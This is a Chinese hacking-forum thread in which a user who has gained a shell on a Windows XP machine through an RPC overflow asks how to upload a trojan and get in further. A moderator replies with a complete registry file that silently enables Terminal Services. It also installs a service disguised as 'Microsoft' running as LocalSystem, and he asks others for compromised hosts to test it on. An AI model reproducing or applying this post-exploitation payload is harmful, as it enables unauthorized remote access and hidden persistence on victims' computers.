|
 | 作者: six_foxer [six_foxer]
 论坛用户 |
登录 |
| 用rpc溢出了 得到了shell 是xp系统 tftp我不熟啊 有没有最简单的办法进入硬盘? ipc$xp里不行 高手提示一下吧 我自己找资料 谢谢了 [此贴被 six_foxer(six_foxer) 在 12月17日14时43分 编辑过] |
| 地主 发表时间: 12/17 13:24 |
 | 回复: tuzi [tuzi]  版主 |
登录 |
|
那就开启TELNET吧 |
| B1层 发表时间: 12/17 13:31 |
| 回复: six_foxer [six_foxer] 论坛用户 |
登录 |
|
这个我知道啊 有没有办法把木马传上去呢? |
| B2层 发表时间: 12/17 14:12 |
 | 回复: afan271314 [afan271314] 论坛用户 |
登录 |
|
溢出后 好象还没有不能干的事 |
| B3层 发表时间: 12/17 16:49 |
 | 回复: lijingxi [lijingxi] 见习版主 |
登录 |
|
试试这样行不行 我只是猜想 我自己没有实践过! 你可以在对方的计算机上写一个TXT文件! 内容是让对方安装并开放终端,然后把扩展名改成REG文件,然后用REGEDIE.EXE /S *.REG 然后让对方的计算机从新启动! 这样等计算机从新启动以后就可以开放终端了! 我只是这样想! 但是不知道能不能成功, 我自己也没有试过 ! 我现在手上没有肉鸡做这个实验!希望好心人给我一个肉鸡!QQ109548 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] "Enabled"="0" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "ShutdownWithoutLogon"="0" [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] "EnableAdminTSRemote"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] "TSEnabled"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] "Start"=dword:00000002 [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] "Hotkey"="1" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] "Start"=dword:00000002 "ErrorControl"=dword:00000001 "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 "ObjectName"="LocalSystem" "Type"=dword:00000010 "Description"="Microsoft" "DisplayName"="Microsoft" 上面的是开放对方终端的REG文件! |
| B4层 发表时间: 12/19 18:55 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 获得shell以后该怎么办?